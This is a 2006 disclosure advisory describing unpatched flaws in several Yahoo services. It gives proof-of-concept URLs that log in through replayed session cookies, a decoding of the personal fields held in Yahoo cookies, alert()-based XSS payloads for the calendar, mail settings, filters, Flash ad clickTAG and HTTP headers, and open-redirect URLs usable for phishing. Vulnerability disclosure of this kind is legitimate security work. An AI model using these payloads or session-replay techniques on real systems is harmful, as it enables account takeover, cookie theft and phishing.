Yahoo Multiple Vulnerabilities (Authentication Bypass, Session Binding, Cookie

Encoding Security Weakness, Cross-Site Scripting and URL Redirection)

############################################################################

XDisclose Advisory : XD100001

Advisory Released : 20th June 06

Credit : Rajesh Sethumadhavan

Class : Authentication Bypass

Session Binding Vulnerability

Cookies Encoding Security Weakness

Cross-Site Scripting

URL redirection

Severity : Medium

Solution Status : Unpatched

Vendor : Yahoo

Affected applications : Yahoo multiple web-based services

############################################################################

Overview:

Yahoo! Inc. is an American computer services company with a mission to

"be the most essential global Internet service for consumers and

businesses". It operates an Internet portal, including the popular

Yahoo! Mail.According to Web trends Yahoo! is the most visited

website on the Internet today with more than 400 million unique users.

The global network of Yahoo! websites received 3.4 billion page views

per day on average as of October 2005.

Various Yahoo! services are vulnerable to authentication bypass,

session binding, weak cookie encoding, cross-site scripting file

inclusion and url redirection vulnerabilities, which is caused

due to improper validation of user-supplied inputs.

Description:

Multiple vulnerabilities exist in various Yahoo services.

1. Authentication Bypass and Session Binding Vulnerability.

A malicious user can log on to the yahoo without submitting the

username and password by constructing a malicious URL using

cookies.

Same session (URL) can be used to login multiple times from

multiple IP address leading to session binding vulnerability.

POC: (UPDATED in Original Site)

--------------------------------------------------------------------------

http://msg.edit.yahoo.com/config/reset_cookies?&.y=Y=v=1%26n=0kvgvgv3qlf11

%26l=i42.j4ij/o&.t=T=sk=DAAng97eh/smzS%26d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0

BYQFRQUUBdGlwAVNQZHhvQgF6egF4VjFtRUJnV0E-&.done=http%3a//mail.yahoo.com

--------------------------------------------------------------------------

http://msg.edit.yahoo.com/config/reset_cookies?&.y=Y=v=1%26n=0kvgvgv3qlf11

%26l=i42.j4ij/o%26p=m2gvvind13000700&.t=T=sk=DAAng97eh/smzS%26d=c2wBTlRVMU

FUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egF4VjFtRUJnV0E-&.done=http

%3a//mail.yahoo.com

--------------------------------------------------------------------------

Where in "sk" & "d" is session

Screenshot:

http://www.xdisclose.com/Yahoo_Auth_Bypass.png

2. Cookie Encoding Security Weakness

Implementation of cookies in yahoo is too weak that it can be

decoded easily. A malicious attacker can easily collect many

personal information using cookies like year of birth, zipcode,

country and name which can be used to get password from "yahoo

forgot password".

Where in

sk & d is session

n is password

l is username

p is country, year of birth, gender and more

b is cookies created

lg is language

intl is international language

iz is zipcode

jb is Industry and title

POC Screenshot:

http://www.xdisclose.com/Yahoo_Cookie_Encoding.png

3. Cross-Site Scripting.

This vulnerability is resulted from the failure of Yahoo! filtering

engine to block cretin user-supplied inputs

a) Yahoo Calendar Service XSS

The flaws are due to improper sanitization of inputs passed to

"Location", "Address", "Street" and "Phone".

=================================================================

This event repeats every day.

</font><br>

<b>Event Location</b>: <script>alert('Location')</script>

<br><b>Street</b>: <script>alert('Address')</script>

<br><b>City, State, Zip</b>: <script>alert('Street')</script>

<br><b>Phone</b>: <script>alert('Phone')</script>

</font><br>

=================================================================

Screenshot:

http://www.xdisclose.com/XSS_Calender_Address.png

http://www.xdisclose.com/XSS_Calender_Phone.png

http://www.xdisclose.com/XSS_Calender_location.png

http://www.xdisclose.com/XSS_Calender_Street.png

b) Yahoo Options Mail Account XSS

The flaws are due to improper sanitization of inputs passed to

"Name" and "Reply to" parameters.

=================================================================

<td><script>alert('Name')</script></td>

</tr>

<td>Email:</td>

<td>sec.test@yahoo.com</td>

</tr>

<td>Reply-To:</td>

<td><script>alert('Reply')</script>@yah.com</td>

</tr>

=================================================================

Screenshot:

http://www.xdisclose.com/XSS_Mail_Account_Name.png

http://www.xdisclose.com/XSS_Mail_Account_Reply.png

c) Yahoo Options Filter XSS.

The flaws are due to improper sanitization of inputs passed to

"From" and "To" parameters

=================================================================

<b>From</b> contains

"<b><script>alert('From')</script>@yahoo.com</b>"

<br>

   <b>To/CC</b> contains

"<b><script>alert('To')</script>@yahoo.com</b>"

<br>

=================================================================

Screenshot:

http://www.xdisclose.com/Xss_Filter_From.png

http://www.xdisclose.com/Xss_Filter_To.png

d) Yahoo Ads flash file XSS.

The flaws are due to improper sanitization of inputs passed to

flash Ads files

Exploit:

-----------------------------------------------------------------

http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/

20060330_68006_asker1_sound.swf?clickTAG=javascript

:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n

%20By%20Rajesh')

http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/

20060330_68006_1_425x600_monster_morph_asker_1_check.swf?

clickTAG=javascript:alert('XSS%20Possiable%20in%20

Yahoo%20Ads%20\n%20By%20Rajesh')

http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/

042406_68946_v1_728x90_super_nup_fun.swf?clickTAG=

javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads

%20\n%20By%20Rajesh')

http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/

042406_68946_v1_425x600_mon_nup_mplace.swf?clickTAG=

javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads

%20\n%20By%20Rajesh')

http://ad.ie.doubleclick.net/812666/specsavers_2

for1euro_300x250.swf?clickTAG=javascript:

alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20

By%20Rajesh')

http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/

042406_68946_v1_728x90_super_nup_sit.swf?clickTAG=

javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads

%20\n%20By%20Rajesh')

http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_messenger/

20051028_61760_2_425x600_mon_scarehim.swf?clickTAG=

javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads

%20\n%20By%20Rajesh')

http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_mail/

20060512_65459_1_360x100_mwa1_mail_accolades.swf?

clickTAG=javascript:alert('XSS%20Possiable%20in%20

Yahoo%20Ads%20\n%20By%20Rajesh')

and more

-----------------------------------------------------------------

Screenshot:

http://www.xdisclose.com/XSS_Flash_Ads.png

e) Yahoo Mail Beta HTTP Header XSS

The flaws are due to improper sanitization of inputs passed to

all HTTP header like Accept, Accept-Charset, Accept-Language,

Cache-Control, Connection, Content-Length, Content-Type,

Cookie, Keep-Alive, Pragma, SOAPAction and User-Agent in

Yahoo Mail Beta.

POC :

=================================================================

GET :

http://uk.f555.mail.yahoo.com/ymws?m=ListFolders&wssid=

CKyO7/zcUU2

Host: uk.f555.mail.yahoo.com

User-Agent: <script>alert('User-Agent:')</script>

Accept: text/xml,application/xml,application/xhtml+xml,text/

html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;<script>

alert('Accept:')</script>

Accept-Language: en-us,en;q=0.5;<script>alert('Accept-

Language:')</script>

Accept-Encoding: gzip,deflate;<script>alert('Accept-

Encoding:')</script>

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;<script>alert

('Accept-Charset:')</script>

Keep-Alive: 300;<script>alert('Keep-Alive:')</script>

Connection: keep-alive;<script>alert('Connection:')</script>

SOAPAction: urn:yahoo:ymws#ListFolders;<script>alert

('SOAPAction:')</script>

Content-Length: <script>alert('Content-Length:')</script>

Content-Type: application/xml;<script>alert('Content-

Type:')</script>

Cookie: B=dcnl4j129c7tu&b=3&s=j3;

F=a=aNqy1CosvW3BmaGno6BSLOpXkP2PCglCZ3_LDJtts8oaitn

kGkgOOjxwPKS6&b=bIpq;Y=v=1&n=0kvgvgv3qlf11&l=i42.j4ij/o&

p=m2gvvind12000700&jb=19|24|&iz=123456

r=g4&lg=uk&intl=uk&np=1;PH=fn=eIhKKoq4dTG7Gjr4FtHqCTA-;

T=z=W/hlEBWF3lEBrRcLnJGLZKoMjIyBjUyNjU2NE9OMzI-&

a=QAE&sk=DAAZ7oQuYalSuV&d=c2wBTlRVMUFUSTF

NVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFXL2hsRUJnV0E-;

U=mt=7lM5FJ2MhYo0WJ.pqDZdpFIY1pCQZRq2Q6ftdw--&ux=W/hlEB

&un=0kvgvgv3qlf11;YM.dpref1=sec.test%3Aspp%257C1;<script>alert

('Cookie:')</script>

Pragma: no-cache;<script>alert('Pragma:')</script>

Cache-Control: no-cache;<script>alert('Cache-Control:')

</script>"

=================================================================

Screenshot:

http://www.xdisclose.com/XSS_MailBeta_Accept.png

http://www.xdisclose.com/XSS_MailBeta_Accept-Charset.png

http://www.xdisclose.com/XSS_MailBeta_Accept-Language.png

hhttp://www.xdisclose.com/XSS_MailBeta_Cache-Control.png

http://www.xdisclose.com/XSS_MailBeta_Connection.png

http://www.xdisclose.com/XSS_MailBeta_Content-Length.png

http://www.xdisclose.com/XSS_MailBeta_Content-Type.png

http://www.xdisclose.com/XSS_MailBeta_Cookie.png

http://www.xdisclose.com/XSS_MailBeta_Keep-Alive.png

http://www.xdisclose.com/XSS_MailBeta_Pragma.png

http://www.xdisclose.com/XSS_MailBeta_SoapAction.png

http://www.xdisclose.com/XSS_MailBeta_User-Agent.png

Impact:

Successful exploitation allows execution of arbitrary script

code in a users browser session in context of an affected site

which may allow to steal cookie based authentication

credentials.

3. URL redirection.

This is due failure of filtering of incoming untrusted data before

the content reaches their users .This can be exploited for phishing

attack. The vulnerable parameters are yahoo search web, image,

video, preferences, cache, yahoo answers and more urls containing

/*http://yahoo.com or /**http://yahoo.com

Exploit:

---------------------------------------------------------------------------

http://rds.yahoo.com/_ylt=Ah0geusyaM2xEzqMAjS9XNyoA/SIG=11do5qdq6/

EXP=1148028186/**http%3a//www.xdisclose.com

http://search.yahoo.com/preferences/preferences?pref_done=

http%3a//www.xdisclose.com

---------------------------------------------------------------------------

Screenshot:

http://www.xdisclose.com/URL_Redirection_WebSearch.png

http://www.xdisclose.com/URL_Redirection_Images.png

http://www.xdisclose.com/URL_Redirection_Video.png

4) Interesting facts about Yahoo

Yahoo Mail Inbox shows wrong unread messages count if it is above

65535 unread messages.

Screenshot:

http://www.xdisclose.com/Yahoo_Inbox.png

Original Advisory:

http://www.xdisclose.com/XD100001.txt

Credits:

Rajesh Sethumadhavan has been credited with the discovery of this

vulnerability

Disclaimer:

This entire document is strictly for educational, testing and

demonstrating purpose only. Modification use and/or publishing this

information is entirely on your own risk. The exploit code is to be

used on your own email account. I am not liable for any direct or

indirect damages caused as a result of using the information or

demonstrations provided in any part of this advisory.